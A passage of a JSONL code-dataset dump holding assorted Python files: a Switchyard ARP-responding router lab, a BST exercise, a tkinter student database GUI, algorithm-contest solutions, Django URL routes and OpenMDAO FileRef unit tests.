stuff here\n self.interfaces = net.interfaces() \n self.ip_list=[intf.ipaddr for intf in self.interfaces]\n self.mac_list=[intf.ethaddr for intf in self.interfaces]\n self.arp_table={}\n \n def router_main(self): \n '''\n Main method for router; we stay in a loop in this method, receiving\n packets until the end of time.\n '''\n while True:\n gotpkt = True\n try:\n timestamp,dev,pkt = self.net.recv_packet(timeout=1.0)\n except NoPackets:\n log_debug(\"No packets available in recv_packet\")\n gotpkt = False\n except Shutdown:\n log_debug(\"Got shutdown signal\")\n break\n \n if gotpkt:\n log_debug(\"Got a packet: {}\".format(str(pkt)))\n log_info(\"Got a packet: {}\".format(str(pkt)))\n arp = pkt.get_header(Arp)\n if arp is None:\n log_info(\"Not arp Packet\")\n else:\n log_info(\"operation kind {}\".format(str(arp.operation)))\n self.arp_table[arp.senderprotoaddr]=arp.senderhwaddr\n if arp.operation == 1:\n log_info(\"recive arp requests\")\n index=-1\n for i in range(len(self.ip_list)):\n if self.ip_list[i]==arp.targetprotoaddr:\n index=i\n break\n if index != -1:\n log_info(\"match the packet\")\n answer=create_ip_arp_reply(self.mac_list[index], arp.senderhwaddr, self.ip_list[index],arp.senderprotoaddr)\n self.net.send_packet(dev, answer)\n log_info(\"send answer: {}\".format(str(answer)))\n else:\n log_info(\"no match\")\n else:\n if arp.operation == 2:\n log_info(\"recive arp reply\")\n self.arp_table[arp.targetprotoaddr]=arp.targethwaddr\n else:\n log_info(\"recive unk arp\")\n log_info(\"Table Shown as follows\")\n for (k,v) in self.arp_table.items(): \n print (\"%s \" % k,v )\n \n \n \n\n\n\n\n\ndef main(net):\n '''\n Main entry point for router. Just create Router\n object and get it going.\n '''\n r = Router(net)\n r.router_main()\n net.shutdown()\n","repo_name":"Ricardokevins/NJU_ComputerNetWork","sub_path":"switchyard-master/lab_3/myrouter.py","file_name":"myrouter.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"28584161535","text":"# Drzewo BST T reprezentowane jest przez obiekty klasy Node:\n\nclass Node:\n def __init__(self):\n self.left = None # lewe poddrzewo\n self.right = None # prawe poddrzewo\n self.parent = None # rodzic drzewa jeśli istnieje\n self.value = None # przechowywana wartość\n\n# Proszę zaimplementować funkcję:\n\n# def ConvertTree(T):\n# ...\n\n# która przekształca drzewo T na drzewo o minimalnej wysokości, w którym węzły spełniają warunek:\n# największy element na danym poziomie jest mniejszy od najmniejszego elementu na kolejnym poziomie.\n# Funkcja zwraca korzeń nowego drzewa. Poziomy numerujemy od korzenia do liści. Funkcja powinna być\n# możliwie jak najszybsza oraz - jako kryterium drugiego rzędu - używać jak najmniejszej ilości pamięci\n# (poza pamięcią już wykorzystaną na reprezentacje drzewa). Proszę oszacować złożoność czasową oraz\n# pamięciową użytego algorytmu.\n\n# Przyklad poprawnego przeksztalcenia.\n\n# 11 2\n# / \\ / \\\n# 3 13 3 5\n# / \\ / \\ \\\n# 2 7 11 7 13\n# /\n# 5\n\n#################### ROZW ZA 1 pkt\n\ndef ConvertTree(tree):\n\n def put_in_order(tree):\n\n if tree:\n put_in_order(tree.left) # dodajemy node'y do listy\n list.append(tree) # z posortowanymi wartosciami\n put_in_order(tree.right) # (wykorzystujemy wlasnosc BST)\n\n list = []\n\n put_in_order(tree)\n n = len(list)\n\n for i in range(n):\n list[i].left = list[2*i+1] if 2*i+1 < n else None # drzewo binarne\n list[i].right = list[2*i+2] if 2*i+2 < n else None\n list[i].parent = list[(i-1)//2] if i > 0 else None\n\n return list[0]\n\n#########################\n\nfrom zad1testy import runtests\n\nruntests(ConvertTree)","repo_name":"marcepanowyy/Algorithms-DataStructures","sub_path":"2020.2021/KP/I/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37675083778","text":"from tkinter import *\r\nimport tkinter.messagebox\r\nimport stddb\r\n\r\nclass Student:\r\n def __init__(self,root):\r\n self.root =root\r\n self.root.title(\"student database management system\")\r\n self.root.geometry(\"1350x750+0+0\")\r\n self.root.config(bg=\"cadet blue\")\r\n\r\n AdmissionNo=StringVar()\r\n StudentName=StringVar()\r\n Class=StringVar()\r\n DateOfBirth=StringVar()\r\n Age=StringVar()\r\n Gender=StringVar()\r\n Address=StringVar()\r\n ContactNo=StringVar()\r\n \r\n #============================Function=============================\r\n \r\n def iExit():\r\n iExit= tkinter.messagebox.askyesno(\"Students Database Management Systems\",\"Confirm if you want to exit\")\r\n if iExit > 0:\r\n root.destroy()\r\n return\r\n \r\n def clearData():\r\n self.txtAdmissionNo.delete(0,END)\r\n self.txtStudentName.delete(0,END)\r\n self.txtClass.delete(0,END)\r\n self.txtDateOfBirth.delete(0,END)\r\n self.txtAge.delete(0,END)\r\n self.txtGender.delete(0,END)\r\n self.txtAddress.delete(0,END)\r\n self.txtContactNo.delete(0,END)\r\n\r\n def addData():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.addStdRec(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get())\r\n studentlist.delete(0,END)\r\n studentlist.insert(END,(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get()))\r\n\r\n def DisplayData():\r\n studentlist.delete(0,END)\r\n for row in stddb.viewData():\r\n studentlist.insert(END,row,str(\"\"))\r\n\r\n def StudentRec(event):\r\n global sd\r\n searchStd = studentlist.curselection()[0]\r\n sd = studentlist.get(searchStd)\r\n\r\n self.txtAdmissionNo.delete(0,END)\r\n self.txtAdmissionNo.insert(END,sd[1])\r\n self.txtStudentName.delete(0,END)\r\n self.txtStudentName.insert(END,sd[2])\r\n self.txtClass.delete(0,END)\r\n self.txtClass.insert(END,sd[3])\r\n self.txtDateOfBirth.delete(0,END)\r\n self.txtDateOfBirth.insert(END,sd[4])\r\n self.txtAge.delete(0,END)\r\n self.txtAge.insert(END,sd[5])\r\n self.txtGender.delete(0,END)\r\n self.txtGender.insert(END,sd[6])\r\n self.txtAddress.delete(0,END)\r\n self.txtAddress.insert(END,sd[7])\r\n self.txtContactNo.delete(0,END)\r\n self.txtContactNo.insert(END,sd[8])\r\n\r\n def DeleteData():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.deleteRec(sd[0])\r\n clearData()\r\n DisplayData()\r\n\r\n def update():\r\n if(len(AdmissionNo.get())!=0):\r\n stddb.dataUpdate(sd[0],sd[1],sd[2],sd[3],sd[4],sd[5],sd[6],sd[7],sd[8])\r\n if(len(AdmissionNo.get())!=0):\r\n # stddb.addStdRec(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get())\r\n studentlist.delete(0,END)\r\n studentlist.insert(END,(AdmissionNo.get(), StudentName.get(), Class.get(), DateOfBirth.get(), Age.get(),Gender.get(), Address.get(), ContactNo.get()))\r\n \r\n #============================Frames===============================\r\n \r\n MainFrame=Frame(self.root, bg=\"cadet blue\")\r\n MainFrame.grid()\r\n\r\n TitleFrame = Frame(MainFrame, bd=2,padx=54,pady=8,bg=\"Ghost White\", relief=RIDGE)\r\n TitleFrame.pack(side=TOP)\r\n\r\n self.lblTitleFrame= Label(TitleFrame, font=('arial',47,'bold'),text=\"Student Database Management System\",bg=\"Ghost White\")\r\n self.lblTitleFrame.grid()\r\n\r\n ButtomFrame = Frame(MainFrame, bd=2, width=1350,height=70, padx=18,pady=10,bg=\"Ghost White\", relief=RIDGE)\r\n ButtomFrame.pack(side=BOTTOM)\r\n\r\n DataFrame = Frame(MainFrame, bd=1, width=1300,height=400, padx=20,pady=20, relief=RIDGE,bg=\"cadet blue\")\r\n DataFrame.pack(side=BOTTOM)\r\n\r\n DataFrameLEFT = LabelFrame(DataFrame, bd=1, width=1000,height=600, padx=20, relief=RIDGE,bg=\"Ghost White\",\r\n font=('arial',20,'bold'),text=\"Student Info\\n\")\r\n DataFrameLEFT.pack(side=LEFT)\r\n\r\n DataFrameRIGHT = LabelFrame(DataFrame, bd=1, width=450,height=300, padx=31,pady=3, relief=RIDGE,bg=\"Ghost White\",\r\n font=('arial',20,'bold'),text=\"Student Details\\n\")\r\n DataFrameRIGHT.pack(side=RIGHT)\r\n \r\n #============================Labels and Entry Widget===============================\r\n \r\n self.lblAdmissionNo= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"AdmissionNo:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAdmissionNo.grid(row=0,column=0,stick=W)\r\n self.txtAdmissionNo= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=AdmissionNo,width=39)\r\n self.txtAdmissionNo.grid(row=0,column=1)\r\n\r\n self.lblStudentName= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"StudentName:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblStudentName.grid(row=1,column=0,stick=W)\r\n self.txtStudentName= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=StudentName,width=39)\r\n self.txtStudentName.grid(row=1,column=1)\r\n\r\n self.lblClass= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Class:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblClass.grid(row=2,column=0,stick=W)\r\n self.txtClass= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Class,width=39)\r\n self.txtClass.grid(row=2,column=1)\r\n\r\n self.lblDateOfBirth= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"DateOfBirth:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblDateOfBirth.grid(row=3,column=0,stick=W)\r\n self.txtDateOfBirth= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=DateOfBirth,width=39)\r\n self.txtDateOfBirth.grid(row=3,column=1)\r\n\r\n self.lblAge= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Age:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAge.grid(row=4,column=0,stick=W)\r\n self.txtAge= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Age,width=39)\r\n self.txtAge.grid(row=4,column=1)\r\n\r\n self.lblGender= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Gender:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblGender.grid(row=5,column=0,stick=W)\r\n self.txtGender= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Gender,width=39)\r\n self.txtGender.grid(row=5,column=1)\r\n\r\n self.lblAddress= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"Address:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblAddress.grid(row=6,column=0,stick=W)\r\n self.txtAddress= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=Address,width=39)\r\n self.txtAddress.grid(row=6,column=1)\r\n\r\n self.lblContactNo= Label(DataFrameLEFT, font=('arial',20,'bold'),text=\"ContactNo:\",padx=2,pady=2,bg=\"Ghost White\")\r\n self.lblContactNo.grid(row=7,column=0,stick=W)\r\n self.txtContactNo= Entry(DataFrameLEFT, font=('arial',20,'bold'),textvariable=ContactNo,width=39)\r\n self.txtContactNo.grid(row=7,column=1)\r\n\r\n #============================ListBox & ScrollBar Widget==================\r\n \r\n scrollbar = Scrollbar(DataFrameRIGHT)\r\n scrollbar.grid(row=0,column=1,sticky='ns')\r\n\r\n studentlist=Listbox(DataFrameRIGHT,width=41,height=16,font=('arial',12,'bold'),yscrollcommand=scrollbar.set)\r\n studentlist.bind('<>',StudentRec)\r\n studentlist.grid(row=0,column=0,padx=8)\r\n scrollbar.config(command= studentlist.yview)\r\n\r\n \r\n #============================Button Widget===============================\r\n \r\n self.btnAddDate = Button(ButtomFrame, text=\"Add New\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=addData)\r\n self.btnAddDate.grid(row=0,column=0)\r\n self.btnDisplayData = Button(ButtomFrame, text=\"Display\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=DisplayData)\r\n self.btnDisplayData.grid(row=0,column=1)\r\n self.btnClear = Button(ButtomFrame, text=\"Clear\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=clearData)\r\n self.btnClear.grid(row=0,column=2)\r\n self.btnDelete= Button(ButtomFrame, text=\"Delete\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=DeleteData)\r\n self.btnDelete.grid(row=0,column=3)\r\n self.btnUpdate = Button(ButtomFrame, text=\"Update\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=update)\r\n self.btnUpdate.grid(row=0,column=5)\r\n self.btnExit = Button(ButtomFrame, text=\"Exit\",font=('arial',20,'bold'),height=1,width=10,bd=4,command=iExit)\r\n self.btnExit.grid(row=0,column=6)\r\n\r\nif __name__=='__main__':\r\n root = Tk()\r\n application = Student(root)\r\n root.mainloop()\r\n","repo_name":"rabina575/Student-DBMS","sub_path":"ip project.py","file_name":"ip project.py","file_ext":"py","file_size_in_byte":9237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2828132535","text":"from itertools import product\n\n\nclass Solution:\n\n dx = [1, 0, -1, 0]\n dy = [0, 1, 0, -1]\n\n def is_valid(self, x, y, n, m, grid):\n return 0 <= x < n and 0 <= y < m and grid[x][y] == '.'\n\n def check_move(self, cur, target, n, m, grid, box):\n q = list()\n q.append(cur)\n vis = set(q)\n if cur == target:\n return True\n while q:\n cur = q.pop(0)\n cur_x, cur_y = cur[0], cur[1]\n for i in range(4):\n new_x, new_y = cur_x + self.dx[i], cur_y + self.dy[i]\n pos = new_x, new_y\n # print(n, m, new_x, new_y)\n if 0 <= new_x < n and 0 <= new_y < m and (new_x, new_y) not in vis and grid[new_x][new_y] == '.' and pos != box:\n if pos == target:\n return True\n q.append((new_x, new_y))\n vis.add(pos)\n\n return False\n\n\n def minPushBox(self, grid):\n\n n, m = len(grid), len(grid[0])\n terminal, box, person = 0, 0, 0\n\n for i, j in product(range(n), range(m)):\n if grid[i][j] == 'T': terminal = i, j\n elif grid[i][j] == 'B': box = i, j\n elif grid[i][j] == 'S': person = i, j\n if grid[i][j] != '#': grid[i][j] = '.'\n\n q = list()\n q.append((box, person, 0))\n vis = set()\n while q:\n cur = q.pop(0)\n cur_box, cur_person, step = cur\n r, c = cur_box\n for i in range(4):\n new_x, new_y = r + self.dx[i], c + self.dy[i]\n next_box = new_x, new_y\n person_x, person_y = new_x - 2 * self.dx[i], new_y - 2 * self.dy[i]\n pre_person = person_x, person_y\n if(self.is_valid(new_x, new_y, n, m, grid) and self.is_valid(person_x, person_y, n, m, grid)\n and (next_box, i) not in vis and self.check_move(cur_person, pre_person, n, m, grid, cur_box)):\n if next_box == terminal:\n return step + 1\n q.append((next_box, pre_person, step + 1))\n vis.add((next_box, i))\n\n return -1","repo_name":"Minori-bot/ACM-Code","sub_path":"leetcode/contest/163/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"41995858792","text":"# ------------------------------------------------------------------------------\n# Assignment 06, Question 1\n# ------------------------------------------------------------------------------\n\n# 1) Assignment 4: Factors\ndef factors(n):\n lofactors = []\n for i in range (1, n+1):\n if n % i == 0:\n lofactors.append(i)\n return lofactors\n \n \n# 2) Assignment 3: Third Character \ndef new_word(s):\n if len(s) < 3:\n return s\n else:\n char = s[2]\n newword = \"\"\n for c in s:\n if c == char:\n newword = newword + \"#\"\n else:\n newword = newword + c\n return newword[:2] + char + newword[3:]","repo_name":"catherinekdong/ibm-coursera","sub_path":"a06q1.py","file_name":"a06q1.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70770132292","text":"_ = input()\n\nrooms = input().split()\n\nstudents = []\n\nfor i in range(len(rooms)):\n\tstudents.append((int(rooms[i]), i + 1))\n\n\nstudents.sort(reverse=True)\n\ntotal = 0\n\nfor i in range(1, len(students)):\n\ttotal += students[i][0]\n\nif total < students[0][0]:\n\tprint(\"impossible\")\nelse:\n\tfor s, i in students:\n\t\tprint(str(i), end=' ')\n\tprint()\n\n","repo_name":"DaltonCole/ProgramingProblems","sub_path":"kattis/redistribution/tuple.py","file_name":"tuple.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33790234374","text":"from django.urls import path\n\nfrom .views import create_post, home, search_business, setup_profile, setup_business, biz_list, contact\n\n\nurlpatterns = [\n path('', home, name='home'),\n path('contact/', contact, name='contact'),\n path('setup-profile/', setup_profile, name='setup_profile'),\n path('setup-business/', setup_business, name='setup_business'),\n path('biz-list/', biz_list, name='biz_list'),\n path('search/', search_business, name='search_business'),\n path('create-post/', create_post, name='create_post'),\n\n]\n","repo_name":"davidkiama/NeighbourHood","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24184655854","text":"\r\n# z<0 --> no access\r\n# z between 0 to 29 access with id 200 to 300\r\n# z between 30 to 50 access with id==name\r\nnam = input('Who are you')\r\nprint ('Welcome', nam)\r\n\r\nz=int(input(\"Your number\"))\r\nif z<0:\r\n print(\"you are not authorised to access\")\r\n\r\nelif z<30:\r\n b=int(input(\"enter your id\"))\r\n if b>200 & b<300:\r\n print(\"access granted\")\r\n else:\r\n print(\"sorry...no access\")\r\nelif z<50:\r\n c=input(\"Your your id\")\r\n if c==nam:\r\n print(\"access granted\")\r\n else:\r\n print(\"no authorisation found\")\r\nelse:\r\n print(\"You can close program you neither have no. nor id\")\r\n \r\n\r\n\r\n","repo_name":"jaychopra04/Python-Test","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72808552452","text":"\nimport os\nimport unittest\nimport struct\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nimport errno\n\nfrom openmdao.api import Problem, Component, Group, ExecComp, FileRef\nfrom openmdao.util.file_util import build_directory\n\nclass FileSrc(Component):\n def __init__(self, path=''):\n super(FileSrc, self).__init__()\n self.add_output(\"ascii_dat\", FileRef(os.path.join(path,\"ascii.dat\")))\n self.add_output(\"bin_dat\", FileRef(os.path.join(path,\"bin.dat\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n # generate the output files\n ascii_fref = unknowns['ascii_dat']\n with ascii_fref.open('w') as f:\n f.write(\"this is line 1\\nthis is line 2\")\n\n bin_fref = unknowns['bin_dat']\n with bin_fref.open('wb') as f:\n f.write(struct.pack('ddd', 3.14, 10.6, 123.456))\n\nclass FilePass(Component):\n def __init__(self, path=''):\n super(FilePass, self).__init__()\n self.add_param(\"ascii_in\", FileRef(os.path.join(path,\"ascii.dat\")))\n self.add_param(\"bin_in\", FileRef(os.path.join(path,\"bin.dat\")),\n binary=True)\n self.add_output(\"ascii_out\", FileRef(os.path.join(path,\"ascii.out\")))\n self.add_output(\"bin_out\", FileRef(os.path.join(path,\"bin.out\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n ascii_in_ref = params['ascii_in']\n bin_in_ref = params['bin_in']\n\n # read from input FileRefs\n with ascii_in_ref.open('r') as f:\n ascii_dat = f.read()\n\n with bin_in_ref.open('rb') as f:\n bin_dat = struct.unpack('ddd', f.read())\n\n # modify data\n ascii_dat += \"\\nthis is line 3\"\n bin_dat = list(bin_dat) + [-98.76]\n\n ascii_out_ref = unknowns['ascii_out']\n bin_out_ref = unknowns['bin_out']\n\n # write to output FileRefs\n with ascii_out_ref.open('w') as f:\n f.write(ascii_dat)\n\n with bin_out_ref.open('wb') as f:\n f.write(struct.pack('dddd', *bin_dat))\n\nclass FileSink(Component):\n def __init__(self, path=''):\n super(FileSink, self).__init__()\n self.add_param(\"ascii_in\", FileRef(os.path.join(path,\"ascii_final.dat\")))\n self.add_param(\"bin_in\", FileRef(os.path.join(path,\"bin_final.dat\")),\n binary=True)\n\n def solve_nonlinear(self, params, unknowns, resids):\n pass # nothing to do\n\nclass FileBin(Component):\n def __init__(self):\n super(FileBin, self).__init__()\n self.add_output(\"fout\", FileRef(\"file.dat\"), binary=True)\n\nclass FileNoBin(Component):\n def __init__(self):\n super(FileNoBin, self).__init__()\n self.add_param(\"fin\", FileRef(\"file.dat\"))\n\n\n\nclass TestFileRef(unittest.TestCase):\n\n def setUp(self):\n self.startdir = os.getcwd()\n self.tmpdir = mkdtemp()\n os.chdir(self.tmpdir)\n\n def tearDown(self):\n os.chdir(self.startdir)\n try:\n rmtree(self.tmpdir)\n except OSError as e:\n # If directory already deleted, keep going\n if e.errno not in (errno.ENOENT, errno.EACCES, errno.EPERM):\n raise e\n\n def _compare_files(self, src, middle, sink):\n with src.unknowns['ascii_dat'].open('r') as f:\n src_ascii_dat = f.read()\n\n with src.unknowns['bin_dat'].open('r') as f:\n src_bin_dat = struct.unpack('ddd', f.read())\n\n with middle.params['ascii_in'].open('r') as f:\n middle_ascii_in = f.read()\n\n with middle.params['bin_in'].open('r') as f:\n middle_bin_dat = struct.unpack('ddd', f.read())\n\n with middle.unknowns['ascii_out'].open('r') as f:\n middle_ascii_out = f.read()\n\n with middle.unknowns['bin_out'].open('r') as f:\n middle_bin_out = struct.unpack('dddd', f.read())\n\n with sink.params['ascii_in'].open('r') as f:\n sink_ascii_in = f.read()\n\n with sink.params['bin_in'].open('rb') as f:\n sink_bin_in = struct.unpack('dddd', f.read())\n\n self.assertEqual(src_ascii_dat, \"this is line 1\\nthis is line 2\")\n self.assertEqual(src_bin_dat, (3.14, 10.6, 123.456))\n self.assertEqual(middle_ascii_in, src_ascii_dat)\n self.assertEqual(middle_bin_dat, src_bin_dat)\n self.assertEqual(middle_ascii_out, \"this is line 1\\nthis is line 2\\nthis is line 3\")\n self.assertEqual(middle_bin_out, (3.14, 10.6, 123.456, -98.76))\n self.assertEqual(sink_ascii_in, middle_ascii_out)\n self.assertEqual(sink_bin_in, middle_bin_out)\n\n def _build_model(self, path=''):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc(path=path))\n middle = root.add(\"middle\", FilePass(path=path))\n sink = root.add(\"sink\", FileSink(path=path))\n\n root.connect(\"src.ascii_dat\", \"middle.ascii_in\")\n root.connect(\"src.bin_dat\", \"middle.bin_in\")\n root.connect(\"middle.ascii_out\", \"sink.ascii_in\")\n root.connect(\"middle.bin_out\", \"sink.bin_in\")\n\n return p, src, middle, sink\n\n def test_same_dir(self):\n p, src, middle, sink = self._build_model()\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['ascii.dat', 'ascii.out',\n 'bin.dat', 'bin.out',\n 'ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs1(self):\n os.mkdir('src')\n os.mkdir('middle')\n os.mkdir('sink')\n\n p, src, middle, sink = self._build_model()\n\n src.directory = 'src'\n middle.directory = \"middle\"\n sink.directory = 'sink'\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files/directories\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['src', 'middle', 'sink']))\n files = set(os.listdir('src'))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat']))\n files = set(os.listdir('middle'))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat', 'ascii.out', 'bin.out']))\n files = set(os.listdir('sink'))\n self.assertEqual(files, set(['ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs2(self):\n # dirs introduced via system.directory and in FileRef path attrs\n\n p, src, middle, sink = self._build_model(path='nest')\n\n src.directory = 'src'\n src.create_dirs = True\n middle.directory = \"middle\"\n middle.create_dirs = True\n sink.directory = 'sink'\n sink.create_dirs = True\n\n p.setup(check=False)\n p.run()\n\n self._compare_files(src, middle, sink)\n\n # check presence of files/directories\n files = set(os.listdir('.'))\n self.assertEqual(files, set(['src', 'middle', 'sink']))\n\n files = set(os.listdir('src'))\n self.assertEqual(files, set(['nest']))\n files = set(os.listdir('middle'))\n self.assertEqual(files, set(['nest']))\n files = set(os.listdir('sink'))\n self.assertEqual(files, set(['nest']))\n\n files = set(os.listdir(os.path.join('src', 'nest')))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat']))\n files = set(os.listdir(os.path.join('middle', 'nest')))\n self.assertEqual(files, set(['ascii.dat', 'bin.dat', 'ascii.out', 'bin.out']))\n files = set(os.listdir(os.path.join('sink', 'nest')))\n self.assertEqual(files, set(['ascii_final.dat', 'bin_final.dat']))\n\n def test_diff_dirs3(self):\n # dirs introduced via system.directory and in FileRef path attrs but\n # create_dirs is not set\n\n p, src, middle, sink = self._build_model(path='nest')\n\n src.directory = 'src'\n middle.directory = \"middle\"\n sink.directory = 'sink'\n\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertEqual(str(err).replace('/private',''), \"directory '%s' doesn't \"\n \"exist for FileRef('%s'). Set \"\n \"create_dirs=True in system 'src' to create the \"\n \"directory automatically.\" %\n (os.path.join(self.tmpdir,'src','nest'),\n os.path.join('nest','ascii.dat')))\n else:\n self.fail(\"Exception expected\")\n\n def test_mismatch(self):\n p = Problem(root=Group())\n root = p.root\n binsys = root.add(\"binsys\", FileBin())\n nobinsys = root.add(\"nobinsys\", FileNoBin())\n root.connect('binsys.fout', 'nobinsys.fin')\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertEqual(str(err), \"Source FileRef has (binary=True) and dest has (binary=False).\")\n else:\n self.fail(\"Exception expected\")\n\n def test_ref_unconnected(self):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc())\n sink = root.add(\"sink\", FileSink())\n sink2 = root.add(\"sink2\", FileSink())\n\n root.connect(\"src.ascii_dat\", \"sink.ascii_in\")\n\n try:\n p.setup(check=False)\n except Exception as err:\n self.assertTrue(\"FileRef param 'sink2.ascii_in' is unconnected but will \"\n \"be overwritten by the following FileRef unknown(s): \"\n \"['src.ascii_dat']. Files referred to by the FileRef unknowns are: \"\n \"['%s']. To remove this error, make a \"\n \"connection between sink2.ascii_in and a FileRef unknown.\" %\n os.path.join(self.tmpdir, 'ascii.dat') in str(err).replace('\\\\\\\\','\\\\').replace('/private',''), )\n else:\n self.fail(\"Exception expected\")\n\n def test_ref_multi_connections(self):\n p = Problem(root=Group())\n root = p.root\n src = root.add(\"src\", FileSrc())\n src2 = root.add(\"src2\", FileSrc())\n sink = root.add(\"sink\", FileSink())\n sink2 = root.add(\"sink2\", FileSink())\n\n root.connect(\"src.ascii_dat\", \"sink.ascii_in\")\n root.connect(\"src2.ascii_dat\", \"sink2.ascii_in\")\n\n try:\n p.setup(check=False)\n except Exception as err:\n # osx tacks a /private to the beginning of the tmp pathname, resulting\n # in test diffs, so just get rid of it\n msg = \"Input file '%s' is referenced from FileRef param(s) ['sink.ascii_in', \" \\\n \"'sink2.ascii_in'], which are connected to multiple output \" \\\n \"FileRefs: ['src.ascii_dat', 'src2.ascii_dat']. Those FileRefs \" \\\n \"reference the following files: %s.\" % (\n os.path.join(self.tmpdir, 'ascii_final.dat'),\n [os.path.join(self.tmpdir, 'ascii.dat'),\n os.path.join(self.tmpdir, 'ascii.dat')])\n self.assertTrue(msg in str(err).replace('/private',''))\n else:\n self.fail(\"Exception expected\")\n\nclass FileComp(Component):\n def __init__(self, *args, **kwargs):\n super(FileComp, self).__init__(*args, **kwargs)\n self.add_output(\"out\", 0.0)\n\n def solve_nonlinear(self, params, unknowns, resids):\n with open(self.name+\".in\", 'r') as f:\n unknowns['out'] = float(f.read())\n\n\nclass TestDirectory(unittest.TestCase):\n\n def setUp(self):\n self.startdir = os.getcwd()\n self.tmpdir = mkdtemp()\n os.chdir(self.tmpdir)\n build_directory({\n 'top': {\n 'nest1': {\n 'c1.in': '3.14'\n },\n 'c2.in': '5.0'\n }\n })\n\n def tearDown(self):\n os.chdir(self.startdir)\n try:\n rmtree(self.tmpdir)\n except OSError as e:\n # If directory already deleted, keep going\n if e.errno not in (errno.ENOENT, errno.EACCES, errno.EPERM):\n raise e\n\n def test_sysdirs(self):\n p = Problem(root=Group())\n p.root.directory = 'top'\n nest1 = p.root.add('nest1', Group())\n nest1.directory = 'nest1'\n nest1.add('c1', FileComp())\n nest2 = p.root.add('nest2', Group())\n nest2.add('c2', FileComp())\n p.setup(check=False)\n p.run()\n self.assertEqual(p['nest1.c1.out'], 3.14)\n self.assertEqual(p['nest2.c2.out'], 5.0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"OpenMDAO/OpenMDAO1","sub_path":"openmdao/core/test/test_fileref.py","file_name":"test_fileref.py","file_ext":"py","file_size_in_byte":12815,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"44"} +{"seq_id":"72288495492","text":"class Solution(object):\n def helper(self, dic, li, l):\n if l == 0:\n self.ret.append(li + li[::-1])\n elif l == 1:\n for k in dic:\n if dic[k] == 1: self.ret.append(li + [k] + li[::-1])\n else:\n for k in dic:\n if dic[k] >= 2:\n dic[k] -= 2\n self.helper(dic, li+[k], l-2)\n dic[k] += 2\n\n def generatePalindromes(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n l = len(s)\n dic = collections.defaultdict(int)\n for i in s: dic[i] += 1\n odd = False\n for k,v in dic.iteritems():\n if v%2 == 